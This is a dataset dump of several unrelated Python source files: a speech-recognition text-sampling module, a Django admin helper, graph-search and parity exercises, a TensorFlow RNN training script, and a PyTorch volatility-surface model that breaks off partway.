The following tuples are all valid:\n\n (A(pre_text), A(style_text), A(ref_text))\n (A(pre_text), B(style_text), B(ref_text))\n (B(pre_text), A(style_text), A(ref_text))\n (B(pre_text), B(style_text), B(ref_text))\n\n If transforms is not given, the following pre-defined transforms\n are available:\n 0: original (mixed-cased, with punc)\n 1: upper_only_alpha (upper-cased, no punc)\n\n When the transform of text and pre_text match, we can use the whole\n pre_text as the prompt text.\n\n Args:\n texts (List[str]):\n A list of ref_texts whose first item is the ground truth\n text from books.\n pre_texts (List[str]):\n A list of pre_texts, whose first item is the groundtruth\n pre_text from books.\n context_list: Optional[str] = None,\n A list of biasing words separated by space\n rare_word_list: Optional[str] = None,\n A list of rare-words separated by space (used as distractors)\n transforms (List[Callable[[str], str]]): A list of possible transforms to be applied\n\n Returns:\n A dictionary of ref_text, pre_text, style_text\n \"\"\"\n # import pdb; pdb.set_trace()\n assert len(texts) == len(pre_texts)\n assert len(texts) == 2\n\n if context_list is not None:\n context_list = context_list.lower()\n\n # we assume the first item to be ground truth\n gt_text = texts[0]\n gt_pre_text = pre_texts[0]\n\n if transforms is None:\n transforms = [\n lambda x: x, # identity: return the input itself\n upper_only_alpha,\n lower_only_alpha,\n lower_all_char,\n ]\n\n sampling_weight = [\n 0.7,\n 0.3,\n 0.0,\n 0.0,\n ] # Mixed-punc should have the largest sampling prob\n\n total_transforms = len(transforms) # do not use the recognized trans\n\n # Select a transformation randomly\n i_text, i_pre_text = np.random.choice(total_transforms, 2, p=sampling_weight)\n\n # get the normalized text and pre_text\n text = transforms[i_text](gt_text)\n pre_text = get_pre_text_with_context_list2(\n text=gt_text,\n pre_text=gt_pre_text,\n context_list=context_list,\n rare_words_list=rare_word_list,\n )\n pre_text = transforms[i_pre_text](pre_text)\n\n if i_text == i_pre_text:\n style_text = get_substring(pre_text, min_len=min_len_style, max_len=150)\n else:\n # get the pre_text of same style as text\n # For now, **don't** do transform to the style text\n style_text = gt_pre_text\n # style_text = pre_texts[i_text] if i_text <= 1 else transforms[i_text-2](gt_pre_text)\n style_text = get_substring(style_text, min_len=min_len_style, max_len=150)\n\n return {\n \"text\": train_text_normalization(text),\n \"pre_text\": train_text_normalization(pre_text),\n \"style_text\": train_text_normalization(style_text),\n \"transform_ids\": i_text,\n }\n\n\ndef get_pre_text_with_context_list(\n text: str,\n pre_text: str,\n context_list: str,\n rare_words_list: List[str] = None,\n) -> str:\n # Always get the first one, which is the gt (mixed-cased trans), but with upper_only_alpha\n # By a small proportion of time, use the substring of ref_text as pre_text\n\n if context_list != \"\" and context_list is not None:\n v = random.random()\n if v < 0.5:\n # correct + distractors\n # sample distractors\n num_distractors = random.randint(0, 50)\n distractors = random.sample(rare_words_list, num_distractors)\n # sample correct\n correct = context_list.split()\n i = random.randint(1, len(correct))\n correct = random.sample(correct, i)\n # combine correct and distractors\n pre_text = distractors + correct\n random.shuffle(pre_text)\n pre_text = \" \".join(pre_text)\n elif v < 0.7:\n splitted = text.split()\n sampling_weights = 
[len(w) ** 1.2 for w in splitted]\n sampling_weights = [p / sum(sampling_weights) for p in sampling_weights]\n i = random.randint(1, min(len(splitted), 20))\n splitted = list(np.random.choice(splitted, i, p=sampling_weights))\n num_distractors = random.randint(0, 70)\n distractors = random.sample(rare_words_list, num_distractors)\n splitted += distractors\n random.shuffle(splitted) # shuffle the list\n pre_text = \" \".join(splitted)\n else:\n pre_text = pre_text\n else:\n v = random.random()\n if v < 0.1:\n splitted = text.split()\n sampling_weights = [len(w) ** 1.2 for w in splitted]\n sampling_weights = [p / sum(sampling_weights) for p in sampling_weights]\n i = random.randint(1, min(len(splitted), 20))\n splitted = list(np.random.choice(splitted, i, p=sampling_weights))\n num_distractors = random.randint(0, 70)\n distractors = random.sample(rare_words_list, num_distractors)\n splitted += distractors\n random.shuffle(splitted) # shuffle the list\n pre_text = \" \".join(splitted) # join only after the distractors are mixed in\n elif v < 0.2:\n # full distractors\n num_distractors = random.randint(5, 100)\n distractors = random.sample(rare_words_list, num_distractors)\n pre_text = \" \".join(distractors)\n\n elif v < 0.3:\n pre_text = get_substring(text, min_len=15, max_len=150)\n else:\n pre_text = pre_text\n\n return pre_text\n\n\ndef get_pre_text_with_context_list2(\n text: str,\n pre_text: str,\n context_list: str,\n rare_words_list: List[str] = None,\n) -> str:\n # Get the pre_text, either the ground truth preceding text or\n # a list of words consisting of biasing words and distractors\n # By a small proportion of time, use the substring of ref_text as pre_text\n\n if context_list != \"\" and context_list is not None:\n v = random.random()\n if v < 0.4:\n # sample distractors\n num_distractors = random.randint(50, 100)\n distractors = random.sample(rare_words_list, num_distractors)\n # sample correct\n correct = context_list.split()\n i = random.randint(1, len(correct))\n correct = random.sample(correct, i)\n # combine correct and distractors\n pre_text = distractors + correct\n random.shuffle(pre_text)\n pre_text = \" \".join(pre_text)\n elif v < 0.55:\n splitted = text.split()\n sampling_weights = [\n len(w) ** 1.2 for w in splitted\n ] # longer words with higher weights\n sampling_weights = [p / sum(sampling_weights) for p in sampling_weights]\n i = random.randint(1, min(len(splitted), 20))\n splitted = list(np.random.choice(splitted, i, p=sampling_weights))\n num_distractors = random.randint(50, 100)\n distractors = random.sample(rare_words_list, num_distractors)\n splitted += distractors\n random.shuffle(splitted) # shuffle the list\n pre_text = \" \".join(splitted)\n else:\n pre_text = pre_text\n else:\n v = random.random()\n if v < 0.3:\n splitted = text.split()\n sampling_weights = [len(w) ** 1.2 for w in splitted]\n sampling_weights = [p / sum(sampling_weights) for p in sampling_weights]\n i = random.randint(1, min(len(splitted), 20))\n splitted = list(np.random.choice(splitted, i, p=sampling_weights))\n num_distractors = random.randint(50, 100)\n distractors = random.sample(rare_words_list, num_distractors)\n splitted += distractors\n random.shuffle(splitted) # shuffle the list\n pre_text = \" \".join(splitted) # join only after the distractors are mixed in\n elif v < 0.4:\n # full distractors\n num_distractors = random.randint(5, 100)\n distractors = random.sample(rare_words_list, num_distractors)\n pre_text = \" \".join(distractors)\n elif v < 0.6:\n pre_text = get_substring(text, min_len=15, max_len=150)\n else:\n pre_text = pre_text\n\n return pre_text\n\n\n
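def _editor_demo_pre_text() -> None:\n # Editor's hedged sketch (hypothetical toy inputs, not in the original\n # file): shows the biasing-list style pre_text produced above; output\n # varies from call to call because the sampling is random.\n rare = [\"rare%d\" % i for i in range(200)]\n out = get_pre_text_with_context_list2(\n text=\"the quick brown fox\",\n pre_text=\"some preceding sentence\",\n context_list=\"fox\",\n rare_words_list=rare,\n )\n assert isinstance(out, str)\n\n\n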
def naive_triplet_text_sampling(\n texts: List[str],\n pre_texts: List[str],\n context_list: str = None,\n rare_word_list: List[str] = None,\n min_len_style: Optional[int] = 120,\n):\n # The simplest text sampling function, used only for\n # evaluation; it uses a fixed sentence as the style text\n\n return {\n \"text\": train_text_normalization(texts[0]),\n \"pre_text\": train_text_normalization(pre_texts[0]),\n \"style_text\": \"Mixed-case English transcription, with punctuation. Actually, it is fully not related. What do you think?\",\n \"transform_ids\": 0,\n }\n\n\ndef random_shuffle_subset(\n data: List[str],\n p: float = 0.2,\n p_mask: float = 0.05,\n) -> List[str]:\n \"\"\"\n Randomly shuffle a subset of the batch: a fraction `p` of the samples\n in the original batch are shuffled, while the others keep their original order.\n\n With a probability of `p_mask`, replace the original string with an empty string.\n\n \"\"\"\n\n num_to_shuffle = int(len(data) * p)\n id_to_shuffle = np.random.choice(len(data), num_to_shuffle, replace=False)\n item_to_shuffle = [data[id] for id in id_to_shuffle]\n random.shuffle(item_to_shuffle)\n\n for id, item in zip(id_to_shuffle, item_to_shuffle):\n data[id] = item\n\n # Randomly mask a proportion of the data to empty string\n if p_mask > 0:\n for i in range(len(data)):\n if random.random() < p_mask:\n data[i] = \"\"\n\n return data\n\n\nif __name__ == \"__main__\":\n texts = [\n \"AA, BB, cC, dD!\",\n \"AA BB CC DD\",\n ]\n\n pre_texts = [\n \"EE, Ff, Gg? EE, Ff, Gg? EE, Ff, Gg? EE, Ff, Gg?\",\n \"EE FF GG EE FF GG EE FF GG EE FF GG EE FF GG\",\n ]\n for i in range(10):\n print(f\"Run: {i}\")\n print(triplet_text_sampling(texts, pre_texts))\n","repo_name":"k2-fsa/icefall","sub_path":"egs/libriheavy/ASR/zipformer_prompt_asr/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":21496,"program_lang":"python","lang":"en","doc_type":"code","stars":640,"dataset":"github-code","pt":"37"} +{"seq_id":"23386901238","text":"import json\nfrom json.decoder import JSONDecodeError\nimport logging\n\nfrom django import forms\nfrom django.forms import widgets\nfrom django.apps import AppConfig\nfrom django.contrib import admin\nfrom django.contrib.admin.sites import AlreadyRegistered\nfrom django.contrib.postgres.fields import JSONField\nfrom django.db.models import Model, ManyToManyField\n\n\nLOGGER = logging.getLogger('django.server')\n\n\nclass PrettyJSONWidget(widgets.Textarea):\n def format_value(self, value):\n try:\n value = json.dumps(json.loads(value), indent=2, sort_keys=True)\n # these lines will try to adjust size of TextArea to fit to content\n row_lengths = [len(r) for r in value.split('\\n')]\n self.attrs['rows'] = min(max(len(row_lengths) + 2, 10), 30)\n self.attrs['cols'] = min(max(max(row_lengths) + 2, 40), 120)\n return value\n except JSONDecodeError as err:\n LOGGER.warning('Error while formatting JSON: %s', err)\n return super(PrettyJSONWidget, self).format_value(value)\n\n\nclass DisplayAllAdmin(admin.ModelAdmin):\n formfield_overrides = {\n ManyToManyField: {'widget': forms.CheckboxSelectMultiple},\n JSONField: {'widget': PrettyJSONWidget},\n }\n\n def __init__(self, model, site):\n self.list_display = [field.name for field in model._meta.fields]\n super(DisplayAllAdmin, self).__init__(model, site)\n\n\nclass _GenericModelFormTemplate(forms.ModelForm):\n # template methods / search fields go in here\n pass\n\n\nclass _GenericModelAdminTemplate(DisplayAllAdmin):\n # any relevant behavioural specifics\n search_fields = 
('id', )\n\n\nclass _GenericModelFormMeta(type):\n \"\"\"\n A meta class to control admin form generation.\n\n Reference: http://stackoverflow.com/a/6581949\n \"\"\"\n def __new__(cls, clsname, bases, attrs):\n # making sure we are using the correct class\n if len(bases) < 1: # pragma: no cover\n raise ValueError('GenericAdminForm requires a base class')\n assert issubclass(bases[0], Model)\n\n meta = type('GenericAdminModelFormMeta',\n (object, ),\n {'model': bases[0], 'fields': '__all__'})\n class_dict = {'Meta': meta}\n\n # add user overrides, if specified\n class_dict.update(attrs)\n model_form = type(\n bases[0].__name__ + 'ModelForm',\n (_GenericModelFormTemplate, ),\n class_dict)\n return model_form\n\n\nclass _GenericModelAdminMeta(type):\n \"\"\"\n ``type()`` magic for the ModelAdmin class.\n \"\"\"\n def __new__(cls, clsname, bases, attrs):\n # making sure we are using the correct class\n if len(bases) < 1: # pragma: no cover\n raise ValueError('GenericAdminForm requires a base class')\n\n # django ModelAdmin classes are required to have a Meta member class\n # with a 'model' attribute that points to the model type\n meta = type('GenericAdminModelAdminMeta',\n (object, ),\n {'model': bases[0]})\n class_dict = {'Meta': meta}\n\n # we want all our generic form behaviours to be inherited as well, so\n # add these to the attribute dict.\n class_dict['form'] = _GenericModelFormMeta(\n clsname, bases, attrs)\n class_dict.update(attrs)\n model_admin = type(\n bases[0].__name__ + 'ModelAdmin',\n (_GenericModelAdminTemplate, ),\n class_dict)\n return model_admin\n\n\ndef register_models(models, mixins=None, **attr_dict):\n if mixins is None:\n mixins = ()\n\n mixins = tuple(mixins)\n models = list(models)\n\n model_admins = [\n _GenericModelAdminMeta(x.__name__, (x,) + mixins, attr_dict)\n for x in models\n ]\n\n for model, model_admin in zip(models, model_admins):\n try:\n admin.site.register(model, model_admin)\n except AlreadyRegistered:\n pass\n\n\nclass AdminAppConfig(AppConfig):\n def ready(self):\n register_models(self.get_models())\n","repo_name":"nkprince007/fitbit-subscriber","sub_path":"admin/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4068,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"20514250234","text":"def dfs(v):# 시작점\n vi[v] = 1\n print(v, end=' ')\n for d in node[v]:\n if vi[d] == 0:\n dfs(d)\n return\n\ndef bfs(v):\n q.append(v)\n vi[v] = 1\n while q:\n t = q.pop(0)\n print(t, end=' ')\n for s2 in node[t]:\n if vi[s2] == 0:\n q.append(s2)\n vi[s2] = 1\n\n\nn, m, v = map(int, input().split())\nnode = [[] for _ in range(n+1)]\nvi = [0] * (n+1)\nq = []\n\nfor _ in range(m):\n a, b = map(int, input().split())\n node[a].append(b)\n node[b].append(a)\n\nfor d in node:\n d.sort()\n\ndfs(v)\nprint()\nvi = [0] * (n+1)\nbfs(v)\nprint()","repo_name":"SystemOutGirlsAlgorithm/algorithm","sub_path":"8월/2022-08-31/baekjoon_1206_뚜망.py","file_name":"baekjoon_1206_뚜망.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"37"} +{"seq_id":"33800649328","text":"class ParityOutliner:\n \"\"\"\n You are given an array (which will have a length of at least 3, but could be very large) containing integers.\n The array is either entirely comprised of odd integers or entirely comprised of even integers except for a single\n integer N. 
Write a method that takes the array as an argument and returns this \"outlier\" N.\n \"\"\"\n\n @staticmethod\n def my_case(integers):\n num = [i for i in integers if i % 2 == 0]\n num2 = [i for i in integers if i % 2 != 0]\n return num[0] if len(num) == 1 else num2[0]\n\n @staticmethod\n def best_practice(integers):\n # renamed the parameter from `int` to avoid shadowing the builtin\n odds = [x for x in integers if x % 2 != 0]\n evens = [x for x in integers if x % 2 == 0]\n return odds[0] if len(odds) < len(evens) else evens[0]\n","repo_name":"SaD-Pr0gEr/codewars","sub_path":"parity_outliner.py","file_name":"parity_outliner.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39695684709","text":"\nimport os\nimport numpy as np\n\nimport tensorflow as tf\n\nfrom sequenceReader import SequenceReader\n\nfrom myCNN import MyCNN\nfrom myRNN import MyRNN\n\nLOAD_CNN = True\nLOAD_RNN = True\nSAVE_MODEL = True\n\ncheckfile = \"imgRNNlr0d001_d1_2x128.ckpt\"\n\nLOAD_CNN_checkpoint_path = \"/home/lianos91/Desktop/training_patches/model_flowCNNnamed/\"\n\nsave_checkpoint_path = \"/home/lianos91/Desktop/training_patches/model_flowRNNcomposite_d1_2x128/\"\n\ntrain_err_file = open(\"train_err_flowRNNcomposite_d1_2x128.txt\", \"a+\")\n# Parameters\nlearning_rate = .0005\ntraining_steps = 200000\ndisplay_step = 100\n\n# Network Parameters\nn_classes = 2 # classes \ndropout = .55 #0.70 # Dropout, probability to keep units\nnlayers = 2\nrnnsize = 128\nmaxseq = 16\nbatchsize = 32\n\ndirpath = \"/home/lianos91/Desktop/training_patches/train_patches_128_64_rich/\"\ndatapath = \"val/\"\nreader = SequenceReader(dirpath,datapath,istest=True,maxsequence=16,isComposite=True)\n\n\n#reader = MySequenceReader(\"train_tiny/\",istest=False,maxsequence=maxseq)\n#reader = MySequenceReader(\"train/\",istest=False,maxsequence=maxseq)\n\n#testreader = MySequenceReader(\"val/\",istest=True,maxsequence=maxseq)\n\n\"\"\"Construct and load pretrained CNN model\"\"\"\nwith tf.variable_scope('flow'):\n CNNbase = MyCNN(n_classes,istrainable=False)\n\nsess = tf.InteractiveSession()\nsaverCNN = tf.train.Saver(tf.all_variables())\n\ninit1 = tf.initialize_all_variables()\nsess.run(init1)\n\nif LOAD_CNN:\n ckpt = tf.train.get_checkpoint_state(LOAD_CNN_checkpoint_path)\n if ckpt and ckpt.model_checkpoint_path:\n print(\"[train_script]: LOADED CNN!\")\n saverCNN.restore(sess, ckpt.model_checkpoint_path)\n else:\n print(\"[train_script]: Failed to LOAD CNN!\")\n raise SystemExit \n\n\n\"\"\"Construct RNN\"\"\"\nrnn_net = MyRNN(n_classes,rnnsize,batchsize,maxseq,CNNbase,400,nlayers)\n#rnn_net = MyRNN(n_classes,rnnsize,batchsize,maxseq,CNNbase,128*64,nlayers)\n#rnn_net = MyRNN(n_classes,rnnsize,batchsize,maxseq,CNNbase,64*64,nlayers)\n\n# Define loss \ncost,preds = rnn_net.calc_cost()\n\n\"\"\"Define Optimization settings\"\"\"\n\nmax_grad_norm = 4\ntvars = tf.trainable_variables()\ngrads, _ = tf.clip_by_global_norm(tf.gradients(cost, tvars,aggregation_method=2),\n max_grad_norm)\n \n#get the set of variables that exist before the optimizer is created\ntemp = set(tf.all_variables())\n\noptimizer = tf.train.AdamOptimizer(learning_rate=learning_rate, beta1=0.9, beta2=0.999, epsilon=1e-08, \n use_locking=False, name='Adam')\ntrain_op = optimizer.apply_gradients(zip(grads, tvars))\n\nprint(\"[train_script]: RNN constructed & Optimization is set\")\n\n#remaining variables = ADAM variables + trainable variables\nremaining_vars = (set(tf.all_variables()) - temp ) | set(tf.trainable_variables())\ninit2 = tf.initialize_variables(remaining_vars)\n
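\n# --- editor's note (illustration): two-phase initialization -----------------\n# init1 ran before the pretrained CNN was restored; init2 below touches only\n# the variables created after the `temp` snapshot (the Adam slots and the new\n# trainable RNN weights), so the restored CNN weights are not clobbered.\n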
\nsaverRNN = tf.train.Saver(tf.all_variables())\n\nsess.run(init2)\n\nprint(\"[train_script]: Initialized\")\n\nstep = 1\n \nif LOAD_RNN:\n ckpt = tf.train.get_checkpoint_state(save_checkpoint_path)\n print(ckpt.model_checkpoint_path) \n print(save_checkpoint_path)\n\n if ckpt and ckpt.model_checkpoint_path:\n print(\"[train_script]: LOADED RNN\")\n saverRNN.restore(sess, ckpt.model_checkpoint_path)\n else:\n print(\"[train_script]: failed to load\")\n raise SystemExit\n last_checkpoint_path = ckpt.model_checkpoint_path\n step = 1+int(last_checkpoint_path[last_checkpoint_path.rindex('-')+1:])\n print(step)\n\nprint(\"[train_script]: Start training\")\n \n# Keep training until we reach the maximum number of iterations\ntmp_train_acc = []\ntmp_test_acc = []\ntrain_cost = []\n\nreader._ignoresmall = 5\n\nwhile step < training_steps:\n \n if (step == -1):\n reader._ignoresmall = 0\n\n seqlen,seq_xs, seq_ys = reader.read_batch(batchsize)\n \n \"\"\"If using the composite dataset, then seq_xs will have a 3rd dimension, which is respectively:\n large_patch: 0\n optical flow: 1\n usual patch: 2 \"\"\"\n seq_xs = seq_xs[:,:,1]\n\n \"\"\"set the weights for sequence samples.\"\"\"\n w = rnn_net.weighting(seqlen,[],'uniform')\n \n \"\"\"seq_xs: maxseq(outer) * batchsize(inner) X img_dim \"\"\"\n \"\"\"seq_ys: batchsize X maxseq \"\"\"\n \"\"\"w : batchsize X maxseq \"\"\"\n \"\"\"seqlen: batchsize X 1 \"\"\"\n \n # Fit training using sequence data\n sess.run( [train_op], feed_dict={rnn_net.x: seq_xs, rnn_net.y: seq_ys, \n rnn_net.keep_prob: dropout, rnn_net.early_stop: seqlen, \n rnn_net.cost_w: w}) \n \"\"\"\"\"\"\n \"\"\"get training and test error\"\"\"\n if step % 2 == 0:\n \n pr,corr_predictions,cst,_ = rnn_net.predict(sess,seq_xs,1.,seqlen,w,seq_ys) \n tmp_train_acc.extend(corr_predictions)\n train_cost.append(cst)\n\n if step % display_step == 0:\n\n #output mean training accuracy of past sequences\n m = np.mean(np.array(tmp_train_acc,np.float32))\n m3 = np.mean(np.array(train_cost,np.float32))\n m4 = np.std(np.array(train_cost,np.float32))\n print(\"[train_script]: Step: \"+str(step)+ \", train_acc {:.3f}\".format(m))\n print(\"train_mean_cost {:.3f}\".format(m3)+ \", train_cost_std {:.3f}\".format(m4) )\n train_err_file.write(\"\"+str(m3)+\",\"+str(m)+\"\\n\")\n tmp_train_acc = []\n train_cost = []\n\n #checkpoint save\n if step % (10*display_step) == 0 and SAVE_MODEL:\n print(\"[train_script]: checkpoint\")\n checkpoint_path = os.path.join(save_checkpoint_path, checkfile)\n saverRNN.save(sess, checkpoint_path, global_step=step) \n step += 1\n \n \ntrain_err_file.close()\n\nreader.terminate = True\nprint(\"[train_script]: Optimization Finished!\")\nif SAVE_MODEL:\n print(\"[train_script]: checkpoint\")\n checkpoint_path = os.path.join(save_checkpoint_path, checkfile)\n saverRNN.save(sess, checkpoint_path, global_step=step)\n\n","repo_name":"lianoskn/semesterProject-DNN","sub_path":"src/main_trainRnn.py","file_name":"main_trainRnn.py","file_ext":"py","file_size_in_byte":5827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41699312553","text":"#Import modules\r\nimport os\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom pandas import DatetimeIndex\r\nimport dask\r\nimport scipy\r\nimport time\r\nimport glob\r\nimport torch\r\nimport torch.nn as nn\r\nfrom live_plotter import live_plotter\r\nimport matplotlib.pyplot as plt\r\nfrom mpl_toolkits import mplot3d\r\nimport pickle\r\n\r\nfrom functools import partial\r\nfrom abc import ABCMeta, 
abstractmethod\r\n\r\nimport plottingTools\r\nimport factorialModel\r\nimport loadData\r\n\r\ntmpFolder = \"./tmp/\" #\"./../tmp/\"\r\n#tmpFolder = os.environ['tmp']\r\n\r\n\r\nclass Functional_encoder(nn.Module):\r\n def __init__(self, n_factor):\r\n super(Functional_encoder, self).__init__()\r\n\r\n self.linear1 = nn.Linear(n_factor + 2, 20)\r\n self.linear2 = nn.Linear(20, 1)\r\n # self.linear2 = nn.Linear(20, 20)\r\n # self.linear3 = nn.Linear(20, 1)\r\n\r\n def forward(self, x):\r\n x = self.linear1(x)\r\n x = torch.tanh(x)\r\n x = self.linear2(x)\r\n # x = torch.tanh(x)\r\n # x = self.linear3(x)\r\n return x\r\n\r\n\r\nclass Code(nn.Module):\r\n def __init__(self, n_obs, n_factor, initialValue = None):\r\n super(Code, self).__init__()\r\n # self.code = nn.Parameter(torch.normal(0, 1, size=(n_obs, n_factor)), requires_grad=True)\r\n initialValueTorch = torch.zeros((n_obs, n_factor)) if initialValue is None else torch.tensor( np.reshape(initialValue, (n_obs, n_factor) ).astype(np.float32) ).float()\r\n self.code = nn.Parameter(initialValueTorch, requires_grad=True)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nclass pytorchModel(factorialModel.FactorialModel) :\r\n #######################################################################################################\r\n #Construction functions\r\n #######################################################################################################\r\n def __init__(self,\r\n learningRate, \r\n hyperParameters, \r\n nbUnitsPerLayer, \r\n nbFactors,\r\n modelName = \"./bestPyTorchModel\"):\r\n #pytorch objects \r\n self.optimizer = None\r\n self.optimizer_code = None \r\n \r\n self.MeanFwd = 0\r\n self.StdFwd = 1\r\n self.MeanLogMaturity = 0\r\n self.StdLogMaturity = 1\r\n self.MeanLogMoneyness = 0\r\n self.StdLogMoneyness = 1 # default to 1 (not 0) so scaling never divides by zero\r\n \r\n super().__init__(learningRate, hyperParameters, nbUnitsPerLayer, nbFactors, \r\n modelName = modelName)\r\n \r\n self.metaModelName = self.metaModelName.replace(\".cpkt\", \"Torch\")\r\n self.metaModelNameInit = self.metaModelNameInit.replace(\".cpkt\", \"Torch\") \r\n \r\n #Build the architecture, losses and optimizer.\r\n def buildModel(self):\r\n self.fe = Functional_encoder(self.nbFactors) #Neural network architecture\r\n return\r\n \r\n \r\n #######################################################################################################\r\n #Training functions\r\n #######################################################################################################\r\n #Extract, for each day, the volatility values as outputs and the coordinates as input values\r\n def getLocationFromDatasetList(self, dataSet):\r\n if dataSet[1].ndim > 1 :#historical data\r\n nbObs = dataSet[1].shape[0]\r\n nbPoints = dataSet[1].shape[1]\r\n \r\n vol = dataSet[0].values if dataSet[0] is not None else dataSet[0]\r\n \r\n coordinates = dataSet[1]\r\n yCoor = np.ravel(coordinates.applymap(lambda x : x[1]))\r\n xCoor = np.ravel(coordinates.applymap(lambda x : x[0]))\r\n l_Feature = np.reshape(np.vstack([xCoor, yCoor]).T, (nbObs, nbPoints, 2))\r\n else :#Data for a single day\r\n nbObs = 1\r\n nbPoints = dataSet[1].shape[0]\r\n \r\n vol = np.expand_dims(dataSet[0].values, 0) if dataSet[0] is not None else dataSet[0]\r\n \r\n coordinates = dataSet[1]\r\n yCoor = np.ravel(coordinates.map(lambda x : x[1]))\r\n xCoor = np.ravel(coordinates.map(lambda x : x[0]))\r\n l_Feature = np.reshape(np.vstack([xCoor, yCoor]).T, (nbObs, nbPoints, 2))\r\n \r\n return l_Feature, vol\r\n \r\n \r\n
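 # --- editor's note (illustration): for a history of N days with P quoted\r\n # points per surface, getLocationFromDatasetList returns l_Feature shaped\r\n # (N, P, 2) holding the (x, y) grid coordinates and vol shaped (N, P).\r\n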
 #Sample Mini-batch\r\n def generateMiniBatches(self, dataSetList, nbEpoch):\r\n batchSize = 100\r\n #return self.selectMiniBatchWithoutReplacement(dataSetList, batchSize)\r\n return [dataSetList]\r\n \r\n \r\n def splitValidationAndTrainingSet(self, dataSetTrainList):\r\n #Sample days in validation set\r\n percentageForValidationSet = self.hyperParameters['validationPercentage'] if ('validationPercentage' in self.hyperParameters) else 0.2\r\n #validationSetDays = dataSetTrainList[0].sample(frac=percentageForValidationSet,\r\n # replace=False).sort_index().index \r\n #select Time series ends\r\n nbValidationSetDays = int(percentageForValidationSet * dataSetTrainList[0].index.size)\r\n validationSetDays = dataSetTrainList[0].index[-nbValidationSetDays:]\r\n \r\n validationDataSetList = [x.loc[validationSetDays].sort_index() if x is not None else None for x in dataSetTrainList]\r\n trainingDataSetList = [x.drop(validationSetDays).sort_index() if x is not None else None for x in dataSetTrainList]\r\n return validationDataSetList, trainingDataSetList\r\n \r\n #Sample minibatch of size batchSize for a list of dataset \r\n def selectMiniBatchWithoutReplacement(self, dataSetList, batchSize):\r\n miniBatchList = []\r\n if len(dataSetList)==0:\r\n return miniBatchList\r\n \r\n nbObs = dataSetList[0].shape[0]\r\n idx = np.arange(nbObs)\r\n np.random.shuffle(idx)\r\n nbBatches = int(np.ceil(nbObs/batchSize))\r\n \r\n lastIndex = 0\r\n for k in range(nbBatches) :\r\n firstIndex = k * batchSize\r\n lastIndex = (k+1) * batchSize\r\n miniBatchIndex = idx[firstIndex:lastIndex]\r\n \r\n miniBatch = [x.iloc[miniBatchIndex,:] for x in dataSetList] \r\n miniBatchList.append(miniBatch)\r\n \r\n #Add any observations which were not drawn above so that a full epoch is used;\r\n #with ceil() this remainder is normally empty, so only append a non-empty batch\r\n lastIndex = (nbBatches) * batchSize\r\n miniBatchIndex = idx[lastIndex:]\r\n if len(miniBatchIndex) > 0:\r\n miniBatch = [x.iloc[miniBatchIndex,:] for x in dataSetList] \r\n miniBatchList.append(miniBatch)\r\n \r\n return miniBatchList\r\n \r\n #Sample minibatches of size batchSize for a list of datasets; each batch is drawn\r\n #independently, so observations may recur across batches\r\n def selectMiniBatchWithReplacement(self, dataSetList, batchSize):\r\n miniBatchList = []\r\n if len(dataSetList)==0:\r\n return miniBatchList\r\n \r\n nbObs = dataSetList[0].shape[0]\r\n nbBatches = int(np.ceil(nbObs/batchSize))\r\n \r\n lastIndex = 0\r\n for k in range(nbBatches+1) :\r\n miniBatchIndex = dataSetList[0].sample(n=batchSize,replace=False).index \r\n miniBatch = [x.iloc[miniBatchIndex,:] for x in dataSetList] \r\n miniBatchList.append(miniBatch)\r\n \r\n return miniBatchList\r\n \r\n def train(self, inputTrain, nbEpoch, inputTest = None):\r\n \r\n self.MeanFwd = np.nanmean(np.ravel(inputTrain[2]))\r\n self.StdFwd = np.nanstd(np.ravel(inputTrain[2]))\r\n self.MeanLogMaturity = np.nanmean(self.getLogMaturities(inputTrain))\r\n self.StdLogMaturity = np.nanstd(self.getLogMaturities(inputTrain))\r\n self.MeanLogMoneyness = np.nanmean(self.getLogMoneyness(inputTrain))\r\n self.StdLogMoneyness = np.nanstd(self.getLogMoneyness(inputTrain))\r\n \r\n self.restoringGraph()\r\n nbDays = inputTrain[0].shape[0]\r\n self.code = Code(nbDays, self.nbFactors) #Latent variables\r\n self.optimizer = torch.optim.Adam(self.fe.parameters(), lr=1e-2) #Optimizer for fe\r\n self.optimizer_code = torch.optim.Adam(self.code.parameters(), lr=1e-2) #Optimizer for code\r\n \r\n #x_vec = np.linspace(0, 1, 1000 + 1)[0:-1] \r\n #y_vec = np.zeros(len(x_vec))\r\n \r\n line1 = []\r\n trainingLoss = []\r\n def getLogMaturities(batch):\r\n return batch[1].applymap(lambda x : np.log(x[0] / 252.0))\r\n\r\n for __ in 
range(nbEpoch):#range(100000): #Number of epochs\r\n res_ = []\r\n \r\n miniBatchIndex = np.random.choice(nbDays, 200) if (200 <= nbDays) else np.arange(nbDays)\r\n for k in miniBatchIndex : #random mini-batch\r\n batch = [(elt.iloc[k] if elt is not None else None) for elt in inputTrain]\r\n keptCols = batch[0].dropna().index # batch[0].dropna(axis = 1, how=\"all\").columns\r\n batch = [(elt[keptCols] if elt is not None else None) for elt in batch ]\r\n \r\n tensorList = self.evalBatch(batch, self.code.code[k, :])\r\n \r\n res_.append( tensorList[2] ) #mean of squared errors for each observation\r\n res = torch.mean(torch.stack(res_)) #Mean along mini-batches : training loss\r\n \r\n # res += torch.mean(torch.mean(code.code))**2 + (torch.mean(torch.mean(code.code**2)-1))**2\r\n\r\n if __ < 300:#Pre-train only neural network\r\n self.optimizer.zero_grad() #set gradient to zero\r\n res.backward() #compute loss gradient wrt neural weights\r\n self.optimizer.step() #update neural weights and go to next iteration\r\n\r\n else:#Train neural network and codes\r\n self.optimizer.zero_grad() #set gradient wrt neural weights to zero\r\n self.optimizer_code.zero_grad() #set gradient wrt code\r\n res.backward() # compute loss gradient by AAD\r\n self.optimizer.step() #Update neural weights\r\n self.optimizer_code.step() #Update code\r\n \r\n trainingLoss.append(np.sqrt(res.item()))\r\n print(__, trainingLoss[-1]) #print RMSE\r\n if trainingLoss[-1] <= min(trainingLoss) :\r\n if self.verbose :\r\n print(\"New Best error : \", 